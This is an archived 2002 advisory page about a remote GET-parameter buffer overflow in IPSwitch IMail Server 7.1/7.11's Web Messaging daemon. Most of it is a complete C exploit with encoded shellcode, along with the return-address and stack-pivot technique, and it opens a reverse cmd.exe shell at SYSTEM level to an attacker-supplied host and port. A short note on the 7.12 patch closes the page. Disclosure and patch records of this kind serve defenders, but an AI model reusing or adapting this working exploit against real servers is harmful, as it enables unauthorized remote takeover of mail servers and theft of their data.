TUCoPS :: Windows Net Apps :: WIN5565.HTM

IPSwitch IMail Server remote overflow
29th Jul 2002 [SBWID-5565]
COMMAND

	IPSwitch IMail Server remote overflow

SYSTEMS AFFECTED

	IMail Server 7.1, 7.11 w/o HF1

PROBLEM

	In '2c79cbe14ac7d0b8472d3f129fa1df55' Security Advisory #5 :
	

	There is an overflow present in the GET  parameter  under  the  HTTP/1.0
	specification in the Web Messaging  daemon  in  all  IMail  versions  to
	date.. HTTP/0.9 & HTTP/1.1 are not vulnerable,  as  they  have  been
	fixed in a previous bug report.. oops, forgot one :>
	

	 #EXPLOITATION

	

	<96 bytes><EBP><EIP>

	

	choosing right causes no problems, soooo....
	

	as none of the registers point to our payload on ret  some  trickery  is
	necessary to hit our payload in a dynamic way..  nothing  too  difficult
	however
	

	esp is 8 bytes from our payload, but  it  has  to  run  right  over  our
	chosen ret (call/jmp esp).. so flat  out  jmping  esp  has  some  shitty
	near-impossible odds working against it.. so we  need  to  do  some  sex
	first
	

	execution flow:
	

	eip overran, ret (esp-4) -> (imailsec.dll) land at pop

	ebx, ret10 (esp-18) -> (imailsec.dll) call esp

	

	after only 3 redirections we've now got esp pointing  at  our  corrupted
	payload.. YUMMY!
	

	preserve esp -> sub esp -> jmp esp
	

	we preserve esp to prevent our stack from running right over  our  code,
	then we jump relative to our good payload.. ooohh you know whats  coming
	next
	

	recover esp -> execute shell
	

	now that the stack is out of the way, we can just let the shit fly..
	

	see attached exploit.. target imail version  is  7.11  (HF1  applied  or
	not)
	

	

	 Exploit :

	 =======

	

	/*

	        imailexp.c

	        July 25th, 2002

	

	        IPSwitch IMail 7.11 remote 'SYSTEM' exploit

	

	        there is an overflow in the GET parameter under the HTTP/1.0

	        specification in the Web Messaging daemon in all IMail versions

	        to date

	

	        <96 bytes><EBP><EIP>

		

		since none of the registers point to our payload on ret some

		trickery was necessary to hit our payload in a dynamic way,

		but nothing difficult..

	

		execution flow:	

		eip overran, ret (esp-4) -> land at pop ebx, ret10 (esp-18) -> call esp	

		reach corrupted payload	

	

		preserve esp -> sub esp -> jmp esp	

		preserve esp, and jump to good payload

	

		recover esp -> execute shell

		let shit fly

	

	        "In 1995, Ipswitch released IMail Server, the first commercial NT Mail Server.

	        Seven years later there are over 49 million users of IMail worldwide.

	

	        IMail Server 7.1

	        Greater security, improved usability, and new revenue opportunities for service

	        providers."

	

	        7 years in development, 20 minutes of BuffSex v0.3(tm), 4 remote 'root' holes

	

	        2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)

	*/

	

	#include <stdio.h>

	#include <stdlib.h>

	#include <string.h>

	#include <sys/types.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	#include <arpa/inet.h>

	#include <netdb.h>

	#include <sys/errno.h>

	#include <unistd.h>

	

	// dark spyrit's shell as per usual.. queerly modified to call ExitThread

	// yet again.. all that shit on top is to get us home

	unsigned char payload[] =

	"x47x45x54x20x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x24x01x10x90x90x90x90x13xf7x02x10"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x8bxfcx81xc4x11x11x11x11x81xec"

	"x50xddx10x11xffxe4x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x8bxe7xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90x90"

	"x8bxc5x33xc9x66xb9xdbx02x50x80x30x95x40xe2xfax2dx95x95"

	"x64xe2x14xadxd8xcfx05x95xe1x96xddx7ex60x7dx95x95x95x95"

	"xc8x1ex40x14x7fx9ax6bx6ax6ax1ex4dx1exe6xa9x96x66x1exe3"

	"xedx96x66x1exebxb5x96x6ex1exdbx81xa6x78xc3xc2xc4x1exaa"

	"x96x6ex1ex67x2cx9bx95x95x95x66x33xe1x9dxccxcax16x52x91"

	"xd0x77x72xccxcaxcbx1ex58x1exd3xb1x96x56x44x74x96x54xa6"

	"x5cxf3x1ex9dx1exd3x89x96x56x54x74x97x96x54x1ex95x96x56"

	

	"x1ex67x1ex6bx1ex45x2cx9ex95x95x95x7dxe1x94x95x95xa6x55"

	"x39x10x55xe0x6cxc7xc3x6axc2x41xcfx1ex4dx2cx93x95x95x95"

	"x7dxcex94x95x95x52xd2xf1x99x95x95x95x52xd2xfdx95x95x95"

	"x95x52xd2xf9x94x95x95x95xffx95x18xd2xf1xc5x18xd2x85xc5"

	"x18xd2x81xc5x6axc2x55xffx95x18xd2xf1xc5x18xd2x8dxc5x18"

	"xd2x89xc5x6axc2x55x52xd2xb5xd1x95x95x95x18xd2xb5xc5x6a"

	"xc2x51x1exd2x85x1cxd2xc9x1cxd2xf5x1exd2x89x1cxd2xcdx14"

	"xdaxd9x94x94x95x95xf3x52xd2xc5x95x95x18xd2xe5xc5x18xd2"

	"xb5xc5xa6x55xc5xc5xc5xffx94xc5xc5x7dx95x95x95x95xc8x14"

	"x78xd5x6bx6ax6axc0xc5x6axc2x5dx6axe2x85x6axc2x71x6axe2"

	"x89x6axc2x71xfdx95x91x95x95xffxd5x6axc2x45x1ex7dxc5xfd"

	"x94x94x95x95x6axc2x7dx10x55x9ax10x3fx95x95x95xa6x55xc5"

	"xd5xc5xd5xc5x6axc2x79x16x6dx6ax9ax11x02x95x95x95x1ex4d"

	"xf3x52x92x97x95xf3x52xd2x97x80x26x52xd2x91x55x3dx95x94"

	"xffx85x18x92xc5xc6x6axc2x61xffxa7x6axc2x49xa6x5cxc4xc3"

	"xc4xc4xc4x6axe2x81x6axc2x59x10x55xe1xf5x05x05x05x05x15"

	"xabx95xe1xbax05x05x05x05xffx95xc3xfdx95x91x95x95xc0x6a"

	"xe2x81x6axc2x4dx10x55xe1xd5x05x05x05x05xffx95x6axa3xc0"

	"xc6x6axc2x6dx16x6dx6axe1xbbx05x05x05x05x7ex27xffx95xfd"

	"x95x91x95x95xc0xc6x6axc2x69x10x55xe9x8dx05x05x05x05xe1"

	"x09xffx95xc3xc5xc0x6axe2x8dx6axc2x41xffxa7x6axc2x49x7e"

	"x1fxc6x6axc2x65xffx95x6axc3x98xa6x55x39x10x55xe0x6cxc4"

	"xc7xc3xc6x6ax47xcfxccx3ex77x7bx56xd2xf0xe1xc5xe7xfaxf6"

	"xd4xf1xf1xe7xf0xe6xe6x95xd9xfaxf4xf1xd9xfcxf7xe7xf4xe7"

	"xecxd4x95xd6xe7xf0xf4xe1xf0xc5xfcxe5xf0x95xd2xf0xe1xc6"

	"xe1xf4xe7xe1xe0xe5xdcxfbxf3xfaxd4x95xd6xe7xf0xf4xe1xf0"

	"xc5xe7xfaxf6xf0xe6xe6xd4x95xc5xf0xf0xfexdbxf4xf8xf0xf1"

	"xc5xfcxe5xf0x95xd2xf9xfaxf7xf4xf9xd4xf9xf9xfaxf6x95xc2"

	"xe7xfcxe1xf0xd3xfcxf9xf0x95xc7xf0xf4xf1xd3xfcxf9xf0x95"

	"xc6xf9xf0xf0xe5x95xedxedxedxedxedxedxedxedxedxedxedx95"

	"xd6xf9xfaxe6xf0xddxf4xfbxf1xf9xf0x95xc2xc6xdaxd6xdexa6"

	"xa7x95xc2xc6xd4xc6xe1xf4xe7xe1xe0xe5x95xe6xfaxf6xfexf0"

	"xe1x95xf6xf9xfaxe6xf0xe6xfaxf6xfexf0xe1x95xf6xfaxfbxfb"

	"xf0xf6xe1x95xe6xf0xfbxf1x95xe7xf0xf6xe3x95xf6xf8xf1xbb"

	"xf0xedxf0x95xc9x1dxdcx95x20x48x54x54x50x2Fx31x2Ex30x0d"

	"x0ax0dx0a";

	

	main(char argc, char **argv){

		unsigned long ah;

		unsigned short int ap;

	        int fd, i;

	        int bufsize = 1024;

	        int *buffer = (int *)malloc(bufsize);

	        struct sockaddr_in sin;

	        struct hostent *he;

	        struct in_addr in;

	

		printf("IMail 7.11 remote exploit (SYSTEM level)n");

		printf("2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)nn");

	

	        if (argc < 5){

	                printf("usage: %s <targethost> <iwebport> <localhost> <localport>nn", argv[0]);

	                printf("iwebport: IMail Web Messaging port (default 8383)nn");

	                exit(-1);

	        }

	

	        ap  = htons(atoi(argv[4]));

	        ap ^= 0x9595;

	

	        if ((he = gethostbyname(argv[3])) == 0){herror(argv[2]);exit(-1);}

	

	        ah  = *((unsigned long *)he->h_addr);

	        ah ^= 0x95959595;

	                                

	        payload[747] = ((ap) & 0xff);

	        payload[748] = ((ap >> 8) & 0xff);

	        

	        payload[752] = ((ah) & 0xff);

	        payload[753] = ((ah >> 8) & 0xff);

	        payload[754] = ((ah >> 16) & 0xff);

	        payload[755] = ((ah >> 24) & 0xff);

	

		if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);}

		

		if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr, he->h_length);}

		else

		if ((inet_aton(argv[1], &in)) < 0){printf("unable to resolve host");exit(-1);}

	

	        sin.sin_family = AF_INET;

	        sin.sin_addr.s_addr = inet_addr(inet_ntoa(in));

	        sin.sin_port = htons(atoi(argv[2]));

			

		printf("ret: 0x10012490 (IMailsec.dll v.2.6.17.28)nn");

		printf("connecting...");

	

		if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror("connection error");exit(-1);}

		

		printf("done.n");

		

		sleep(1);

		

		printf("dumping payload...");

		if(write(fd, payload, strlen(payload)) < strlen(payload)){perror("write error");exit(-1);}

		printf("done.nn");

	

		printf("cmd.exe spawned to [%s:%s]nn", argv[3], argv[4]);

		

		close(fd);

	

	}

	

SOLUTION

	 Update (02 August 2002)

	 ======

	

	Ipswitch released IMail Version 7.12 which  solve  the  buffer  overflow
	bug in the Web Messaging Daemon.
	

	IMail Version 7.12 Relase Notes:
	

	http://support.ipswitch.com/kb/IM-20020731-DM02.htm

	

	Download:
	

	ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail712.exe

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986- AOH